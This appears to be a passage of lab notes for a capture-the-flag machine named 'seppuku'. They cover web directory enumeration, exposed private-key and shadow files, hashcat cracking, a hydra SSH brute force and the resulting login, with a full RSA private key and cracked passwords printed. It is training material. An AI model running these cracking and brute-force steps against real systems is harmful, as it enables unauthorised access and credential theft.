6 :7601
http://192.168.131.90:7601/
Landing Page with same image as 8088
$ gobuster dir -u http://192.168.131.90:7601 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 80
===============================================================
/index.html (Status: 200) [Size: 171]
/b (Status: 301) [Size: 319] [--> http://192.168.131.90:7601/b/]
/c (Status: 301) [Size: 319] [--> http://192.168.131.90:7601/c/]
/a (Status: 301) [Size: 319] [--> http://192.168.131.90:7601/a/]
/t (Status: 301) [Size: 319] [--> http://192.168.131.90:7601/t/]
/d (Status: 301) [Size: 319] [--> http://192.168.131.90:7601/d/]
/r (Status: 301) [Size: 319] [--> http://192.168.131.90:7601/r/]
/f (Status: 301) [Size: 319] [--> http://192.168.131.90:7601/f/]
/e (Status: 301) [Size: 319] [--> http://192.168.131.90:7601/e/]
/h (Status: 301) [Size: 319] [--> http://192.168.131.90:7601/h/]
/w (Status: 301) [Size: 319] [--> http://192.168.131.90:7601/w/]
/q (Status: 301) [Size: 319] [--> http://192.168.131.90:7601/q/]
/database (Status: 301) [Size: 326] [--> http://192.168.131.90:7601/database/]
/production (Status: 301) [Size: 328] [--> http://192.168.131.90:7601/production/]
/keys (Status: 301) [Size: 322] [--> http://192.168.131.90:7601/keys/]
/secret (Status: 301) [Size: 324] [--> http://192.168.131.90:7601/secret/]
/stg (Status: 301) [Size: 321] [--> http://192.168.131.90:7601/stg/]
# most dirs are just empty
http://192.168.131.90:7601/keys/
Name Last modified Size Description
private 2020-05-13 05:28 1.6K
private.bak 2020-05-13 05:28 1.6K
# both contain same data
http://192.168.131.90:7601/keys/private
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAypJlwjKXf0F4YvL2gfwvoUuvB7fuGMMfCe41gLCsTsleOUy2
CJX+oNwVVKPpl6TYI4nXPGbiwfGzoxm0FZa7D9yr83OgwuvMMp83OkVcwL9v+x7a
tK8AAVZ0NjvOPGkvEhB2rPS2mKg1xRKXCM7pA0KSOoDbk9coOpadjg4G0f1YPWrw
p6iLfIErfY2+5hS7QyTQpuRmHuR4eKLF1NFRp8gYuNCVtr0n2Uu6hWuI7RWBGQZJ
Joj8LKjfRRYmKGpyqiGTdRy+8yCyAuT55shuCzXuc+/3HE2jACOD8+pSPKjwxzm4
fuaSfBTUkHfyhiSKIkop2YfIDLKRPM8dGn5zuQIDAQABAoIBADM+s7Vb3Q1ZP54w
foHFjTsNjVqzge0Lt1doxmomx4Aq2sY+DLLBVyfUZSUDTj2JexAKd8OU93o+rcXt
46uudOX/WhR9RMbqpb6MnokEMQGlrCtn08Xvm127RCzQFk0cAsdcGNmKEoMt0mRn
XoPg6/tiJOHd5S5SOKARqAveqoUGUYI3xgsiRpj8CCRIDUgHi9J0++qUeauVw3m3
lvyTnUTw0uf5+sRkI173CUY+ygJapGM7Lg59xzcjEq5H4so0IztQo3o/pOIfeS6W
bqIpY7D63YBGLgpi9JcN/d2bSfafkfhcrAcjPjRXwEFPmYjMbsTBOKcTtCSDVo6/
ho6fTl0CgYEA9F1uIkqxFKIMt2/uK4/1gPOXy/1cjxcsFoah0Ql7d0gj26H6AgXk
nPncIoO1kojPnB+TUy4qz+Bd7teDbkHSaWNJYIVJZQbvskstwgL4+XamiWrJA/Jp
h7y0I0zRxCMBj5yhBNrp6P+f8vtVMpjbKV17jfe6aakfyuayPugHHh8CgYEA1DeM
4lR/+/fUbxtws+aTx8h9TwisYq38D39KNsWkynnb+9pnLCbVbVETtv4sfD/aQfah
R7CxOG+mD4Vryjpk/wwzZeUDzcQpiTx4RsgP6MkFU8knORKfBdimaUpiasWlNWgy
caXR/iA6EmA4jht8vf/+UOUV8GXV9VqDIWUhgycCgYEAvJaGcqyWMUhG7CLT+oal
f5l/Iw0rq7rEabYJmBvrT0k7czt0iK8nmgYy3+gp7ybqoqCzwFQ28itEExn78tGV
o4Pek0EKPY+22TCv5bUJlOz+5bql3AfvbbQyibO1h9tETyMgGXEhaJIvTQSu4deZ
/DiLLCttkDHXuW2FTosfQx0CgYEAkhGOSjapRRBHSxaTE3Cw5UFNZvnsVZu1tCEE
PwD5NVh9HzQr8YrlOnIk5L68deUpYF/WkNbAlLzcizBlifN5kseeFRN188qCYHCb
xPRtZuf+X7ZD5he4FzkRCcXmSeGynjkTB4CAMq+R6RYLt1yaFtk9/gZAfJBLna5o
NbM7Rt8CgYA5oPRfIpKZ5G9LJEAsBUONgBsrpXs+816ZEvBGsqPs/NPhhZMFetKm
RXxYAiEUudMsahP4Woeuxy8kWfM2J2ltwC/HRFuKnKfsHBhsn/FilspYfrafr985
tFnL/K9Z8le1saEGjwCu6zKto7CaFjj2D4Y9ji0sHGBO+tVbtmU/Jg==
-----END RSA PRIVATE KEY-----
http://192.168.131.90:7601/secret/
[ICO] Name Last modified Size Description
[ ] hostname 2020-05-13 03:41 8
[IMG] jack.jpg 2018-09-12 03:49 58K
[ ] passwd.bak 2020-05-13 03:47 2.7K
[ ] password.lst 2020-05-13 03:59 672
[ ] shadow.bak 2020-05-13 03:48 1.4K
http://192.168.131.90:7601/secret/hostname
seppuku
http://192.168.131.90:7601/secret/password.lst
contains a password list
$ curl http://192.168.131.90:7601/secret/passwd.bak
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
cups-pk-helper:x:111:118:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
rabbit-hole:x:1001:1001:,,,:/home/rabbit-hole:/bin/bash
$ curl http://192.168.131.90:7601/secret/shadow.bak
r@bbit-hole:$6$2/SxUdFc$Es9XfSBlKCG8fadku1zyt/HPTYz3Rj7m4bRzovjHxX4WmIMO7rz4j/auR/V.yCPy2MKBLBahX29Y3DWkR6oT..:18395:0:99999:7:::
$ hashcat -m 1800 hash /usr/share/wordlists/rockyou.txt --show
$6$2/SxUdFc$Es9XfSBlKCG8fadku1zyt/HPTYz3Rj7m4bRzovjHxX4WmIMO7rz4j/auR/V.yCPy2MKBLBahX29Y3DWkR6oT..:a1b2c3
rabbit-hole & r@bbit-hole:
# ssh fails with pass a1b2c3
# ssh via private key also fails
# password.lst brute fails
Trying user: seppuku maybe?
# ssh fails with pass a1b2c3
# ssh via private key also fails
$ hydra -l seppuku -P password.lst ssh://192.168.131.90 -t 4 -s 22 -v
[22][ssh] host: 192.168.131.90 login: seppuku password: eeyoree
$ ssh seppuku@192.168.131.90
seppuku@seppuku:~$ whoami;id;hostname;uname -a
seppuku
uid=1000(seppuku) gid=1000(seppuku) groups=1000(seppuku),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
seppuku
Linux seppuku 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64 GNU/Linux
Last updated